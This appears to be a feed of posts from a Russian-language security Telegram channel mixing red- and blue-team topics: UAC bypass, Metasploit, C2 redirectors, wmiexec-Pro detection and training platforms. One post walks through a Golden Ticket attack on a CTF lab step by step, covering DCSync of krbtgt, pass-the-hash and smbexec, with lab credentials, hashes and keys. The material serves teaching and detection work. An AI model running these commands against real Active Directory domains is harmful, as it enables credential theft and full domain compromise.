В новый год с новым названием!🐱

Новогодние праздники прошли, и, значит, самое время возвращаться к работе.
Ещё с самого начала существования канала (когда он был своеобразным "справочником" для 5 человек) я планировал сменить название и аватар, но всё никак не доходили руки. Постепенно аудитория расширялась, изменились тематика и контент, но название оставалось прежним.

Вчера было принято волевое решение всё изменить, и отныне этот блог носит название "Purple Chronicles", отсылая к пути моего ИБ-развития, объединяя темы наступательной🔓 и оборонительной безопасности🛡

🛡How to hack this f*cking UAC🛡

"Как обойти UAC?"
Такой вопрос может возникнуть в тот момент, когда у нас есть шелл на атакуемой машине, скомпрометированный пользователь входит в административную группу, но попытка выполнить любое привилегированное действие приводит к ошибке "Отказано в доступе"❌

В этой статье мы поговорим про UAC чуть подробнее и рассмотрим классический способ его обхода при помощи fodhelper.exe как с отключенным, так и с работающим Windows Defender🛡

Также познакомимся с одним из способов мониторинга и обнаружения вредоносной активности на примере MP SIEM🔴

https://telegra.ph/UAC-bypass-01-12

Если вы ничего не слышали про UAC и не понимаете, о чем идёт речь, то не переживайте: необходимый теоретический материал приведён в начале статьи.

У каждого начинающего аналитика SOC, который изучает события с ID 1 или 4688 в любимой SIEM-системе (🖼️🖼️🔴), могут начать трястись руки от увиденного.

- Что из наблюдаемого норма?
- Как отличить аномалию от обычной активности системных процессов Windows?
- Кто такие эти ваши svchost и почему их так много?

@exc3pt10n спешит на помощь с крутейшей статьёй, где кратко разобраны основные системные процессы ОС Windows, их назначение, свойства (родитель, время запуска), а по некоторым приведена интересная и полезная информация 🖼️

Смело забираем себе и обучаем L1!

🐧Постигаем азы Metasploit Framework🐧
https://telegra.ph/Metasploit-Framework-101-12-26

Этот материал подойдёт для тех, кто никогда не работал с MSF или просто хочет познакомиться с ним получше: здесь мы поговорим об основных возможностях фрэймворка, поработаем с генератором полезных нагрузок, а для практического примера проэксплуатируем уязвимый к CVE-2017-0144 (EternalBlue) Windows Server🪟

Но это не всё! В статье также рассмотрены простой вариант закрепления в Windows через модуль постэксплуатации, два способа повышения простого шелла до оболочки Meterpreter, а также способы дампа SAM и атаки DCSync при помощи модуля Kiwi🥝

#c2 #заметки #обучающий

Не так давно в ходе работы нашёл очень полезный для синих команд репозиторий, содержащий примеры Command & Control (C&C, C2) трафика различных вредоносных платформ☁️
https://github.com/silence-is-best/c2db

Здесь представлена довольно большая база знаний, которая уже не раз помогла мне в правильной категоризации вредоносного ПО, для которого в IDS нет явно определяющих сигнатур☑

#блютим #DFIR

💻Хакер к вам на хост проник? Обнаружим его WMIг!💻
https://telegra.ph/Detecting-wmiexec-Pro-10-28

Разбираем замечательную утилиту wmiexec-Pro, которая приходит на помощь, когда на целевом хосте закрыты SMB, WinRM и RDP. Утилита представляет собой усовершенствованную версию скрипта wmiexec.py из набора Impacket👩‍💻, даёт возможность уклонения от Windows Defender и предлагает модули по обходу AMSI, передаче файлов, удалённому включению RDP с конфигурацией брандмауэра и многое другое🛡

Красным командам советую взять на вооружение🛠

🔎 Но основной упор в статье сделан на детект инструмента как в сетевом трафике, так и в событиях журналов Windows и Sysmon 🔎
А все начиналось с whoami as a SYSTEM...

#пентест #блютим #DFIR

В мире, где технологии развиваются с огромной скоростью, защита информационных систем становятся все более критичной задачей. Роль ИБ-специалистов становится ключевой в противодействии актуальным киберугрозам👺

Однако, сами по себе знания и навыки, которыми обладают специалисты после ВУЗа, могут потерять свою актуальность уже завтра (если вообще актуальны). Чтобы быть на передовой, необходимо постоянно совершенствовать навыки, изучать новейшие угрозы и технологии, адаптироваться к меняющемуся киберпространству. В сфере информационной безопасности постоянное обучение становится неотъемлемой частью успеха, а стремление развивать профессиональные навыки — важным качеством хорошего специалиста💻

Совместно с коллегами и Cyber Media мы подготовили обзор площадок, которые я считаю ключевыми в освоении различных направлений ИБ: для кого-то они станут входным билетом в практическую безопасность, а для кого-то — новым испытанием на пути профессионального развития

☝️Кстати о площадках☝️

TryHackMe — идеальная точка входа для начинающего специалиста😁
Она не требует специальных знаний и способна познакомить со всеми основными направлениями ИБ: RedTeam, пентест (как веб, так и инфраструктурный), BlueTeam (SOC, security engineering, malware analysis), а со вчерашнего дня даже DevSecOps🖼️🖼️🖼️
THM даёт возможность попробовать себя в каждом из них и помогает определиться с выбором дальнейшего направления развития.

Однако, если у вас уже есть некоторый бэкграунд и вы хотите развиваться вглубь, то:
🔵веб — однозначно PortSwigger, лучшие лабы для оттачивания навыков поиска и эксплуатации веб-уязвимостей😈
🔵инфраструктура — HackTheBox, хоть местами чересчур сложно и нестабильно🙃
🔵дефенс — CyberDefenders, где есть серьезные испытания для DFIR-специалистов, аналитиков SOC и охотников за угрозами🛡

Уверен, что каждый найдет себе платформу по душе и будет с огромным стремлением осваивать новые горизонты📖

👺Command & Control Redirector: прячем C2 за HTTP-сервером👺
https://telegra.ph/C2-Redirector-01-26

Использование C&C редиректора — приём, которым красные команды могут пользоваться для сокрытия своей C2-инфраструктуры, а злоумышленники — для введения в заблуждение специалистов SOC📖

Сегодня мы поговорим о преимуществах этого метода и посмотрим на него в действии: поднимем небольшую лабораторию, используя в качестве C2-фрэймворка MetaSploit🐧, а в роли редиректора — веб-сервер Ubuntu🐧 + Apache🖼️

Не обойдем стороной и анализ трафика, который мы будем видеть в сети🦈, а напоследок спрячем признаки C2 за простой HTML-страничкой🖼️

#c2 #обучающий

🎫Немного о Golden Ticket🎫

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!

apt install python3-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/[email protected] -k -no-pass

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

Занимательная история про Kerberoasting от имени пользователя с отключённой преаутентификацией без знания его пароля.
Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен🖼️

Синие команды уже настраивают детекты на странный sname в AS-REQ?